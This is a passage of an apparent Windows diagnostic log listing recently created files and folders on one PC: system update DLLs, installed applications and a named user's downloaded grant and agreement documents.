2016-06-14 14:12 - 2016-05-28 00:11 - 00784896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NMAA.dll
2016-06-14 14:12 - 2016-05-28 00:11 - 00711680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapControlCore.dll
2016-06-14 14:12 - 2016-05-28 00:11 - 00687616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-06-14 14:12 - 2016-05-28 00:11 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-06-14 14:12 - 2016-05-28 00:11 - 00128512 _____ (Microsoft Corporation) C:\Windows\system32\httpprxm.dll
2016-06-14 14:12 - 2016-05-28 00:09 - 01073152 _____ (Microsoft Corporation) C:\Windows\system32\RDXService.dll
2016-06-14 14:12 - 2016-05-28 00:08 - 13385728 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-06-14 14:12 - 2016-05-28 00:08 - 06295552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mos.dll
2016-06-14 14:12 - 2016-05-28 00:06 - 12128256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-06-14 14:12 - 2016-05-28 00:06 - 07200256 _____ (Microsoft Corporation) C:\Windows\system32\BingMaps.dll
2016-06-14 14:12 - 2016-05-28 00:06 - 01339904 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2016-06-14 14:12 - 2016-05-28 00:05 - 03994624 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_nt.dll
2016-06-14 14:12 - 2016-05-28 00:05 - 03664896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-06-14 14:12 - 2016-05-28 00:05 - 02582016 _____ (Microsoft Corporation) C:\Windows\system32\MFMediaEngine.dll
2016-06-14 14:12 - 2016-05-28 00:05 - 01797120 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Immersive.dll
2016-06-14 14:12 - 2016-05-28 00:04 - 06973952 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2016-06-14 14:12 - 2016-05-28 00:04 - 00555520 _____ (Microsoft Corporation) C:\Windows\system32\SyncController.dll
2016-06-14 14:12 - 2016-05-28 00:04 - 00450560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SyncController.dll
2016-06-14 14:12 - 2016-05-28 00:03 - 05323776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2016-06-14 14:12 - 2016-05-28 00:03 - 05205504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BingMaps.dll
2016-06-14 14:12 - 2016-05-28 00:03 - 02609664 _____ (Microsoft Corporation) C:\Windows\system32\NetworkMobileSettings.dll
2016-06-14 14:12 - 2016-05-28 00:03 - 01185280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LocationFramework.dll
2016-06-14 14:12 - 2016-05-28 00:03 - 00693760 _____ (Microsoft Corporation) C:\Windows\system32\internetmail.dll
2016-06-14 14:12 - 2016-05-28 00:03 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\dmenrollengine.dll
2016-06-14 14:12 - 2016-05-28 00:02 - 03590144 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2016-06-14 14:12 - 2016-05-28 00:02 - 02061824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFMediaEngine.dll
2016-06-14 14:12 - 2016-05-28 00:02 - 01534464 _____ (Microsoft Corporation) C:\Windows\system32\LocationFramework.dll
2016-06-14 14:12 - 2016-05-28 00:02 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\updatepolicy.dll
2016-06-14 14:12 - 2016-05-28 00:01 - 01799680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Logon.dll
2016-06-14 14:12 - 2016-05-28 00:01 - 01582080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Immersive.dll
2016-06-14 14:12 - 2016-05-28 00:01 - 01500160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-06-14 14:12 - 2016-05-28 00:01 - 00111104 _____ (Microsoft Corporation) C:\Windows\system32\updatepolicy.dll
2016-06-14 14:12 - 2016-05-28 00:00 - 05660160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2016-06-14 14:12 - 2016-05-28 00:00 - 03585536 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsThresholdAdminFlowUI.dll
2016-06-14 14:12 - 2016-05-28 00:00 - 02635776 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Logon.dll
2016-06-14 14:12 - 2016-05-28 00:00 - 02230272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-06-14 14:12 - 2016-05-28 00:00 - 02168320 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2016-06-14 14:12 - 2016-05-28 00:00 - 01730560 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-06-14 14:12 - 2016-05-28 00:00 - 01707520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ActiveSyncProvider.dll
2016-06-14 14:12 - 2016-05-28 00:00 - 00162816 _____ (Microsoft Corporation) C:\Windows\system32\enrollmentapi.dll
2016-06-14 14:12 - 2016-05-28 00:00 - 00151040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mdmregistration.dll
2016-06-14 14:12 - 2016-05-28 00:00 - 00090624 _____ (Microsoft Corporation) C:\Windows\system32\DeviceEnroller.exe
2016-06-14 14:12 - 2016-05-27 23:59 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\mdmregistration.dll
2016-06-14 14:12 - 2016-05-27 23:58 - 07832576 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2016-06-14 14:12 - 2016-05-27 23:58 - 04896256 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-06-14 14:12 - 2016-05-27 23:58 - 02755584 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-06-14 14:12 - 2016-05-27 23:58 - 02066432 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.dll
2016-06-14 14:12 - 2016-05-27 23:58 - 01996288 _____ (Microsoft Corporation) C:\Windows\system32\ActiveSyncProvider.dll
2016-06-14 14:12 - 2016-05-27 23:57 - 02281472 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-06-14 14:12 - 2016-05-27 23:55 - 01390080 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Shell.dll
2016-06-14 14:12 - 2016-05-27 23:53 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\ngcpopkeysrv.dll
2016-06-13 14:10 - 2016-06-13 20:31 - 00000000 ____D C:\Users\Jennifer JonesSantos\Documents\6700 NHC NAP
2016-06-13 14:09 - 2016-06-13 14:09 - 00000000 ____D C:\Users\Jennifer JonesSantos\Documents\New folder
2016-06-11 12:12 - 2016-06-11 12:13 - 09493711 _____ C:\Users\Jennifer JonesSantos\Downloads\Application-95944.pdf
2016-06-11 12:12 - 2016-06-11 12:12 - 00369655 _____ C:\Users\Jennifer JonesSantos\Downloads\Application-108360.pdf
2016-06-11 12:06 - 2016-06-11 12:11 - 08239988 _____ C:\Users\Jennifer JonesSantos\Downloads\Application-114925.pdf
2016-06-11 12:05 - 2016-06-11 12:05 - 03033061 _____ C:\Users\Jennifer JonesSantos\Downloads\Application-118949.pdf
2016-06-11 12:03 - 2016-06-11 12:03 - 13342663 _____ C:\Users\Jennifer JonesSantos\Downloads\Application-122585.pdf
2016-06-11 12:02 - 2016-06-11 12:02 - 02147348 _____ C:\Users\Jennifer JonesSantos\Downloads\Application-131718.pdf
2016-06-10 15:46 - 2016-06-10 15:46 - 03589258 _____ C:\Users\Jennifer JonesSantos\Downloads\Letters of Support (1).pdf
2016-06-10 15:37 - 2016-06-10 15:37 - 00832341 _____ C:\Users\Jennifer JonesSantos\Downloads\SPHS Admin Agreement.pdf
2016-06-10 15:34 - 2016-06-10 15:34 - 00072837 _____ C:\Users\Jennifer JonesSantos\Downloads\Affiliation Contract Referral Agrements.pdf
2016-06-10 15:24 - 2016-06-10 15:24 - 00123829 _____ C:\Users\Jennifer JonesSantos\Downloads\Resumes for Key Staff.pdf
2016-06-10 15:20 - 2016-06-10 15:20 - 00809548 _____ C:\Users\Jennifer JonesSantos\Downloads\MV4-Complete Program Narrative v1 FV 025.pdf
2016-06-10 15:13 - 2016-06-10 15:13 - 00140761 _____ C:\Users\Jennifer JonesSantos\Downloads\MV4-140-Attachment 5 Agreements agj nhw v2 FV 015.pdf
2016-06-09 11:56 - 2016-06-09 11:56 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\0290c9b
2016-06-09 11:56 - 2016-06-09 11:56 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\49b833e
2016-06-06 08:42 - 2016-06-06 08:42 - 00147184 _____ (Zoom Video Communications, Inc.) C:\Users\Jennifer JonesSantos\Downloads\RingCentral_launcher.exe
2016-06-06 08:42 - 2016-06-06 08:42 - 00002245 _____ C:\Users\Jennifer JonesSantos\Desktop\RingCentral Meetings.lnk
2016-06-06 08:42 - 2016-06-06 08:42 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\RingCentralMeetings
2016-06-06 08:42 - 2016-06-06 08:42 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RingCentral Meetings
2016-06-04 21:42 - 2016-06-04 21:45 - 00712610 _____ C:\Users\Jennifer JonesSantos\Downloads\Letters of Support.pdf
2016-06-04 13:57 - 2016-06-04 13:57 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Microsoft Help
2016-06-04 13:34 - 2016-06-04 13:34 - 01128987 _____ C:\Users\Jennifer JonesSantos\Desktop\Data Resource Guide.pdf
2016-06-04 12:38 - 2016-06-05 14:43 - 00000000 ____D C:\Users\Jennifer JonesSantos\Documents\2002 BayouClinic
2016-06-04 12:08 - 2016-06-04 12:08 - 00018960 _____ (Logitech, Inc.) C:\Windows\system32\Drivers\LNonPnP.sys
2016-06-04 12:08 - 2016-06-04 12:08 - 00000000 ____D C:\Users\Public\Documents\Logishrd
2016-06-04 12:08 - 2016-06-04 12:08 - 00000000 ____D C:\ProgramData\Logitech
2016-06-04 12:07 - 2016-06-04 12:08 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\Logitech
2016-06-04 12:07 - 2016-06-04 12:07 - 03679544 _____ (Logitech Inc.) C:\Users\Jennifer JonesSantos\Downloads\SetPoint6.67.83_smart.exe
2016-06-04 12:07 - 2016-06-04 12:07 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\Logishrd
2016-06-03 23:36 - 2016-06-04 10:27 - 00000000 ____D C:\Users\Jennifer JonesSantos\.android
2016-06-03 23:36 - 2016-06-03 23:36 - 00001331 _____ C:\Users\Public\Desktop\Wondershare TunesGo.lnk
2016-06-03 23:36 - 2016-06-03 23:36 - 00000000 ____D C:\Users\Public\Documents\Wondershare
2016-06-03 23:36 - 2016-06-03 23:36 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\Wondershare
2016-06-03 23:36 - 2016-06-03 23:36 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\HMYGSetting
2016-06-03 23:36 - 2016-06-03 23:36 - 00000000 ____D C:\ProgramData\wondershare
2016-06-03 23:36 - 2016-06-03 23:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2016-06-03 23:36 - 2016-06-03 23:36 - 00000000 ____D C:\Program Files (x86)\Wondershare
2016-06-03 23:36 - 2015-07-30 18:17 - 00031080 _____ (Wondershare) C:\Windows\system32\Drivers\VirtualAudio.sys
2016-06-03 23:36 - 2015-02-27 10:35 - 00000232 _____ C:\Windows\SysWOW64\dllhost.exe.config
2016-06-03 22:34 - 2016-06-03 22:35 - 04147600 _____ ($Co_Name Inc.) C:\Users\Jennifer JonesSantos\Downloads\unifying250.exe
2016-06-03 22:04 - 2016-06-04 11:36 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\Apple Computer
2016-06-03 22:04 - 2016-06-03 22:04 - 00001386 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-06-03 22:04 - 2016-06-03 22:04 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Apple Computer
2016-06-03 22:04 - 2016-06-03 22:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-06-03 22:04 - 2016-06-03 22:04 - 00000000 ____D C:\ProgramData\Apple Computer
2016-06-03 22:04 - 2016-06-03 22:04 - 00000000 ____D C:\Program Files\iPod
2016-06-03 22:04 - 2016-06-03 22:04 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-06-03 22:03 - 2016-06-03 22:03 - 00002535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-06-03 22:03 - 2016-06-03 22:03 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Apple
2016-06-03 22:03 - 2016-06-03 22:03 - 00000000 ____D C:\Program Files\Bonjour
2016-06-03 22:03 - 2016-06-03 22:03 - 00000000 ____D C:\Program Files (x86)\Bonjour
2016-06-03 22:03 - 2016-06-03 22:03 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-06-03 22:01 - 2016-06-03 22:02 - 170473288 _____ (Apple Inc.) C:\Users\Jennifer JonesSantos\Downloads\iTunes6464Setup.exe
2016-06-03 20:56 - 2016-06-03 20:56 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\SolidDocuments
2016-06-03 10:18 - 2016-06-03 10:18 - 00000000 ____D C:\Users\Jennifer JonesSantos\Documents\Custom Office Templates
2016-06-03 10:16 - 2016-06-03 10:16 - 00036352 _____ C:\Users\Jennifer JonesSantos\Downloads\SF424c110215.xls
2016-06-02 17:52 - 2016-06-03 10:26 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\LocalLow\Adobe
2016-06-02 17:52 - 2016-06-02 17:52 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\CEF
2016-06-02 15:06 - 2016-06-02 15:06 - 00000000 ____D C:\Users\Jennifer JonesSantos\Desktop\DESKTOP-LPO4RMB
2016-06-02 14:50 - 2016-06-02 14:50 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\Skype
2016-06-02 14:36 - 2016-06-02 14:36 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\ElevatedDiagnostics
2016-06-02 14:24 - 2016-06-02 14:24 - 00987728 _____ (Google Inc.) C:\Users\Jennifer JonesSantos\Downloads\ChromeSetup (2).exe
2016-06-02 14:24 - 2016-06-02 14:24 - 00987728 _____ (Google Inc.) C:\Users\Jennifer JonesSantos\Downloads\ChromeSetup (1).exe
2016-06-02 14:18 - 2016-06-02 17:52 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Adobe
2016-06-02 12:52 - 2016-06-02 13:09 - 00003972 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-06-02 12:51 - 2016-06-02 13:09 - 00002469 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat DC.lnk
2016-06-02 12:51 - 2016-06-02 13:09 - 00002131 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat Distiller DC.lnk
2016-06-02 12:51 - 2016-06-02 12:51 - 00002108 _____ C:\Users\Public\Desktop\Adobe Acrobat DC.lnk
2016-05-30 17:23 - 2016-06-04 12:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech
2016-05-30 17:23 - 2016-06-04 12:08 - 00000000 ____D C:\ProgramData\LogiShrd
2016-05-30 17:23 - 2016-06-04 12:08 - 00000000 ____D C:\Program Files\Logitech
2016-05-30 17:23 - 2016-06-04 12:08 - 00000000 ____D C:\Program Files\Common Files\Logishrd
2016-05-29 16:10 - 2016-05-29 16:10 - 00000000 ____D C:\Users\Default\AppData\Roaming\Media Center Programs
2016-05-29 16:10 - 2016-05-29 16:10 - 00000000 ____D C:\Users\Default\AppData\LocalGoogle
2016-05-29 16:10 - 2016-05-29 16:10 - 00000000 ____D C:\Users\Default\AppData\Local\Microsoft Help
2016-05-29 16:10 - 2016-05-29 16:10 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Media Center Programs
2016-05-29 16:10 - 2016-05-29 16:10 - 00000000 ____D C:\Users\Default User\AppData\LocalGoogle
2016-05-29 16:10 - 2016-05-29 16:10 - 00000000 ____D C:\Users\Default User\AppData\Local\Microsoft Help
2016-05-29 16:10 - 2016-05-29 16:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RingCentral
2016-05-29 16:10 - 2016-05-29 16:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Quicken 2015
2016-05-29 16:10 - 2016-05-29 16:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-05-29 16:10 - 2016-05-29 16:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HMA! Pro VPN
2016-05-29 16:10 - 2016-05-29 16:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe LiveCycle ES2
2016-05-29 16:09 - 2016-06-03 22:04 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-05-29 16:09 - 2016-05-29 16:09 - 00000000 ____D C:\Users\Public\Documents\Verizon2.0_Log
2016-05-29 16:09 - 2016-05-29 16:09 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2016-05-29 16:07 - 2016-05-29 16:08 - 00000000 ____D C:\Program Files (x86)\RingCentral for Windows
2016-05-29 16:07 - 2016-05-29 16:07 - 00000000 ____D C:\Program Files (x86)\RingCentral
2016-05-29 16:05 - 2016-05-29 16:07 - 00000000 ____D C:\Program Files (x86)\Quicken
2016-05-29 16:05 - 2016-05-29 16:05 - 00000000 ____D C:\Program Files (x86)\Microsoft Analysis Services
2016-05-29 16:04 - 2016-05-29 16:04 - 00000000 ____D C:\Program Files (x86)\Laplink
2016-05-29 16:03 - 2016-05-29 16:04 - 00000000 ____D C:\Program Files (x86)\Java
2016-05-29 16:03 - 2016-05-29 16:03 - 00000000 ____D C:\Program Files (x86)\HP
2016-05-29 16:03 - 2016-05-29 16:03 - 00000000 ____D C:\Program Files (x86)\HMA! Pro VPN
2016-05-29 16:02 - 2016-05-29 16:02 - 00000000 ____D C:\Program Files (x86)\Citrix
2016-05-29 16:02 - 2016-05-29 16:02 - 00000000 ____D C:\Program Files (x86)\Cisco
2016-05-29 16:02 - 2016-05-29 16:02 - 00000000 ____D C:\Program Files (x86)\AX88772
2016-05-29 15:48 - 2016-05-29 15:48 - 00000000 ____D C:\Windows\SysWOW64\spool
2016-05-29 15:44 - 2016-05-29 15:44 - 00000000 ___RD C:\Users\Public\Recorded TV
2016-05-29 15:44 - 2016-05-29 15:44 - 00000000 ___HD C:\Program Files\CanonBJ
2016-05-29 15:44 - 2016-05-29 15:44 - 00000000 ____D C:\ProgramData\WRData
2016-05-29 15:44 - 2016-05-29 15:44 - 00000000 ____D C:\ProgramData\Sun
2016-05-29 15:44 - 2016-05-29 15:44 - 00000000 ____D C:\ProgramData\Samsung
2016-05-29 15:44 - 2016-05-29 15:44 - 00000000 ____D C:\Program Files\Laplink
2016-05-29 15:44 - 2016-05-29 15:44 - 00000000 ____D C:\Program Files\HP
2016-05-29 15:44 - 2016-05-29 15:44 - 00000000 ____D C:\Program Files\AuthenTec
2016-05-29 15:43 - 2016-06-02 13:00 - 00000000 ____D C:\ProgramData\regid.1986-12.com.adobe
2016-05-29 15:43 - 2016-05-29 15:44 - 00000000 ____D C:\ProgramData\RingCentral
2016-05-29 15:43 - 2016-05-29 15:43 - 00000000 ____D C:\ProgramData\Oracle
2016-05-29 15:38 - 2016-05-29 15:38 - 00000000 ___HD C:\ProgramData\CanonIJQuickMenu
2016-05-29 15:38 - 2016-05-29 15:38 - 00000000 ___HD C:\ProgramData\CanonBJ
2016-05-29 15:38 - 2016-05-29 15:38 - 00000000 ____D C:\ProgramData\Intuit
2016-05-29 15:38 - 2016-05-29 15:38 - 00000000 ____D C:\ProgramData\Intel.sav
2016-05-29 15:38 - 2016-05-29 15:38 - 00000000 ____D C:\ProgramData\HP
2016-05-29 15:38 - 2016-05-29 15:38 - 00000000 ____D C:\ProgramData\Cisco Systems
2016-05-29 15:38 - 2016-05-29 15:38 - 00000000 ____D C:\ProgramData\CanonIJWSpt
2016-05-29 15:38 - 2016-05-29 15:38 - 00000000 ____D C:\ProgramData\CanonIJPLM
2016-05-29 15:35 - 2016-06-03 22:03 - 00000000 ____D C:\ProgramData\Apple
2016-05-29 15:35 - 2016-05-29 15:35 - 00000000 ____D C:\ProgramData\APN
2016-05-29 14:48 - 2016-05-29 14:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2016-05-29 12:20 - 2016-05-29 12:20 - 00001473 _____ C:\Users\Public\Desktop\PCmover Professional.lnk
2016-05-29 12:20 - 2016-05-29 12:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Laplink PCmover Professional
2016-05-29 12:20 - 2016-05-29 12:20 - 00000000 ____D C:\ProgramData\Laplink
2016-05-29 12:16 - 2016-06-16 07:22 - 00000000 ____D C:\ProgramData\Protexis
2016-05-29 12:01 - 2016-06-08 19:38 - 00002279 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-05-29 12:01 - 2016-06-08 19:38 - 00002267 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-05-29 11:25 - 2016-05-29 11:26 - 00002110 _____ C:\Windows\System32\Tasks\USER_ESRV_SVC_WILLAMETTE
2016-05-29 11:25 - 2016-03-09 20:43 - 00021984 _____ C:\Windows\system32\Drivers\semav6msr64.sys
2016-05-29 03:44 - 2016-05-29 03:44 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ldiagio_uefi_01009.Wdf
2016-05-28 20:32 - 2016-05-28 20:32 - 00002165 _____ C:\Users\Public\Desktop\Lenovo Solution Center.lnk
2016-05-28 20:32 - 2016-05-28 20:32 - 00001190 _____ C:\Users\Public\Desktop\SHAREit.lnk
2016-05-28 20:32 - 2016-05-28 20:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LenovoSHAREit
2016-05-28 20:28 - 2016-05-28 20:28 - 00002083 _____ C:\Users\Public\Desktop\REACHit.lnk
2016-05-26 18:48 - 2016-05-26 18:48 - 00257872 _____ (Lenovo Group Limited) C:\Windows\system32\iMDriverHelper.dll
2016-05-25 17:36 - 2016-06-15 16:40 - 00484008 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2016-05-22 10:43 - 2016-05-22 10:43 - 00000000 ____D C:\Windows\system32\SleepStudy
2016-05-19 23:36 - 2016-05-19 23:36 - 00987728 _____ (Google Inc.) C:\Users\Jennifer JonesSantos\Downloads\ChromeSetup.exe
2016-05-19 23:29 - 2016-05-19 23:29 - 02662800 _____ (Google) C:\Users\Jennifer JonesSantos\Downloads\gpautobackup_setup (1).exe
2016-05-19 23:29 - 2016-05-19 23:29 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Photos Backup
2016-05-19 23:28 - 2016-05-19 23:28 - 00001494 _____ C:\Users\Jennifer JonesSantos\Desktop\Google Drive.lnk
2016-05-19 23:26 - 2016-06-16 15:58 - 00000934 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-05-19 23:26 - 2016-06-16 15:36 - 00000938 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-05-19 23:26 - 2016-05-19 23:31 - 00003996 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-05-19 23:26 - 2016-05-19 23:31 - 00003764 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-05-19 23:26 - 2016-05-19 23:26 - 00987728 _____ (Google Inc.) C:\Users\Jennifer JonesSantos\Downloads\googledrivesync (2).exe
2016-05-19 23:19 - 2016-06-16 07:16 - 00000000 ____D C:\Windows\system32\MRT
2016-05-19 23:19 - 2016-06-14 14:13 - 142482544 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-05-19 23:19 - 2016-04-23 01:09 - 21123320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-05-19 23:19 - 2016-04-23 00:28 - 16984576 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2016-05-19 23:19 - 2016-02-24 05:28 - 03449168 _____ (Microsoft Corporation) C:\Windows\system32\WSService.dll
2016-05-19 23:19 - 2016-02-24 01:05 - 12586496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2016-05-19 23:19 - 2016-02-24 01:03 - 14252544 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-05-19 23:19 - 2016-02-23 06:32 - 08705672 _____ (Microsoft Corp.) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2016-05-19 23:19 - 2016-02-23 05:38 - 06952088 _____ (Microsoft Corp.) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-05-19 23:19 - 2016-02-23 02:35 - 07533568 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2016-05-19 23:19 - 2016-02-23 02:28 - 06740992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2016-05-19 23:18 - 2016-05-06 00:53 - 00095072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sdport.sys
2016-05-19 23:18 - 2016-05-06 00:03 - 00649216 _____ (Microsoft Corporation) C:\Windows\system32\ngcsvc.dll
2016-05-19 23:18 - 2016-04-23 02:12 - 00713920 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-05-19 23:18 - 2016-04-23 02:12 - 00190144 _____ (Microsoft Corporation) C:\Windows\system32\DeviceCensus.exe
2016-05-19 23:18 - 2016-04-23 01:28 - 01557768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-05-19 23:18 - 2016-04-23 01:28 - 01542816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-05-19 23:18 - 2016-04-23 01:24 - 01997328 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-05-19 23:18 - 2016-04-23 01:24 - 01819208 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-05-19 23:18 - 2016-04-23 01:24 - 00754664 _____ (Microsoft Corporation) C:\Windows\system32\CoreMessaging.dll
2016-05-19 23:18 - 2016-04-23 01:12 - 00925064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-05-19 23:18 - 2016-04-23 01:12 - 00413536 _____ (Microsoft Corporation) C:\Windows\system32\wifitask.exe
2016-05-19 23:18 - 2016-04-23 01:11 - 01092464 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-05-19 23:18 - 2016-04-23 01:09 - 05240960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
2016-05-19 23:18 - 2016-04-23 01:09 - 00569744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll
2016-05-19 23:18 - 2016-04-23 01:08 - 06605504 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
2016-05-19 23:18 - 2016-04-23 01:08 - 00725776 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll
2016-05-19 23:18 - 2016-04-23 01:07 - 01848072 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2016-05-19 23:18 - 2016-04-23 01:07 - 01536088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2016-05-19 23:18 - 2016-04-23 01:00 - 01776768 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2016-05-19 23:18 - 2016-04-23 01:00 - 01399224 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2016-05-19 23:18 - 2016-04-23 01:00 - 01337240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2016-05-19 23:18 - 2016-04-23 00:31 - 13018112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2016-05-19 23:18 - 2016-04-23 00:25 - 00630784 _____ (Microsoft Corporation) C:\Windows\system32\PhoneProviders.dll
2016-05-19 23:18 - 2016-04-23 00:20 - 00606720 _____ (Microsoft Corporation) C:\Windows\system32\wcmsvc.dll
2016-05-19 23:18 - 2016-04-23 00:20 - 00484352 _____ (Microsoft Corporation) C:\Windows\system32\DataSenseHandlers.dll
2016-05-19 23:18 - 2016-04-23 00:20 - 00356864 _____ (Microsoft Corporation) C:\Windows\system32\ActivationManager.dll
2016-05-19 23:18 - 2016-04-23 00:19 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\CredProvDataModel.dll
2016-05-19 23:18 - 2016-04-23 00:18 - 00870400 _____ (Microsoft Corporation) C:\Windows\system32\modernexecserver.dll
2016-05-19 23:18 - 2016-04-23 00:18 - 00471552 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupShim.dll
2016-05-19 23:18 - 2016-04-23 00:17 - 01213440 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
